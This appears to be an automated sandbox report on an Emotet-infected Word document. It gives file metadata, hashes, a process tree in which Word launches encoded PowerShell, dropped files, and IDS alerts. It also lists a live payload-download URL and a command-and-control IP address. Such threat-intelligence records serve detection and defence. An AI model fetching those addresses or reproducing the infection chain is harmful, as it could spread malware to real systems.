Field | Value |
---|---|
File name | Alb. 3-9-8705617.doc |
Full analysis | https://app.any.run/tasks/75bd3ffa-a453-44e3-9e48-07dc960a2b29 |
Verdict | Malicious activity |
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date | October 14, 2019, 15:43:36 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/msword |
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Danish Krone, Subject: synthesize, Author: Caterina Macejkovic, Keywords: deposit, Comments: maximize, Template: Normal.dotm, Last Saved By: Odessa Fay, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 06:52:00 2019, Last Saved Time/Date: Mon Oct 14 06:52:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0 |
MD5 | 52EA8125E3C2E344612C15FE4AF50F0F |
SHA1 | 366570AD5E688BC8F2CFE7294EC8F6FA1FD4A48A |
SHA256 | C73A32D51B8FF9BEF3B5EFBCCEF5C3299EF574C2792788579E3F6F489D197C85 |
SSDEEP | 6144:Og39prKKUzSFnLx3FhvbrptZI141ekKGQ2:Og39prHUGFt333TZ5ej |
Extension | Description |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Property | Value |
---|---|
Title | Danish Krone |
Subject | synthesize |
Author | Caterina Macejkovic |
Keywords | deposit |
Comments | maximize |
Template | Normal.dotm |
LastModifiedBy | Odessa Fay |
RevisionNumber | 1 |
Software | Microsoft Office Word |
TotalEditTime | - |
CreateDate | 2019:10:14 05:52:00 |
ModifyDate | 2019:10:14 05:52:00 |
Pages | 1 |
Words | 30 |
Characters | 172 |
Security | None |
CodePage | Windows Latin 1 (Western European) |
Company | Nicolas Inc |
Lines | 1 |
Paragraphs | 1 |
CharCountWithSpaces | 201 |
AppVersion | 16 |
ScaleCrop | No |
LinksUpToDate | No |
SharedDoc | No |
HyperlinksChanged | No |
TitleOfParts | - |
HeadingPairs | |
Manager | Sporer |
CompObjUserTypeLen | 32 |
CompObjUserType | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2108 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Alb. 3-9-8705617.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
3352 | powershell -e [base64-encoded command omitted] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1788 | "C:\Users\admin\949.exe" | C:\Users\admin\949.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Description: DirectoryBrowse MFC Application; Exit code: 0; Version: 1, 0, 0, 1 |
1152 | --eced2e3c | C:\Users\admin\949.exe | | 949.exe | User: admin; Integrity Level: MEDIUM; Description: DirectoryBrowse MFC Application; Exit code: 0; Version: 1, 0, 0, 1 |
3764 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 949.exe | User: admin; Integrity Level: MEDIUM; Description: DirectoryBrowse MFC Application; Exit code: 0; Version: 1, 0, 0, 1 |
2440 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | | msptermsizes.exe | User: admin; Integrity Level: MEDIUM; Description: DirectoryBrowse MFC Application; Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAA15.tmp.cvr | — | — | — |
3352 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QINBT0W09LQDXC4QJV0U.temp | — | — | — |
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E56DDBC6.wmf | wmf | 861B53BA12E6A45E1E42CEE3F1A99901 | D5EC566A4CD111066F0D9331A5B7FE5A4C0FB6B586158562FE924FCBAA3034D9 |
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6DEB6B50.wmf | wmf | 903AAEF9AFB1605B0A179C8079060FE8 | FD835CA6D7E2B7608A9597ADC0DDD2D8367F76D8300942256DDB27AB6A01C23C |
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CDEAA3C4.wmf | wmf | 3638BA3C5E313C1A051A3A1315DC20C8 | E98A31F7217687A547DBC2867CF07DD53C32F1F54F485F9CD3E74EC01035D685 |
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D493FDDE.wmf | wmf | 81615599B69C2A43DC04752865F3C7AD | DAE706845A3A147299BE27D1642167338FB2278A22C2C66583CE3A39F7522516 |
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 394CD1743936AC750328446DF90979C6 | 7657D31718AC2E450E45DAC9ED56A29269785A682692DBA9DEC1C9B9F728B628 |
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\107262F8.wmf | wmf | A2D9ECAC983E2AF442EF145899C04BD7 | 8A35F3637A1CC11C2E48322008FAA0DEFBAB39E505664F71E5A049805EF7C4C9 |
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA2CBBCB.wmf | wmf | BE82C0B2E9DDC13A99722399EDECAB9F | BD90E2D1EA95895271107D24D64A0BA308E08BEE4B30BD05F686302E6571C804 |
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A42B1013.wmf | wmf | AC07EEC2DBF71D4064CA3F9F20D0A086 | D0EE5067835E5A1292E2805A6FDE4F8652D5287890B2651D366DCCA67247C965 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2440 | msptermsizes.exe | POST | 200 | 200.51.94.251:80 | http://200.51.94.251/nsip/enabled/add/merge/ | AR | binary | 132 b | malicious |
3352 | powershell.exe | GET | 200 | 149.56.222.236:80 | http://tendenciasv.com/wp-admin/1d972a/ | CA | executable | 536 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2440 | msptermsizes.exe | 200.51.94.251:80 | — | Telefonica de Argentina | AR | malicious |
3352 | powershell.exe | 149.56.222.236:80 | tendenciasv.com | OVH SAS | CA | suspicious |
Domain | IP | Reputation |
---|---|---|
tendenciasv.com | | suspicious |
PID | Process | Class | Message |
---|---|---|---|
3352 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3352 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
3352 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3352 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2440 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 15 |
2440 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2440 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |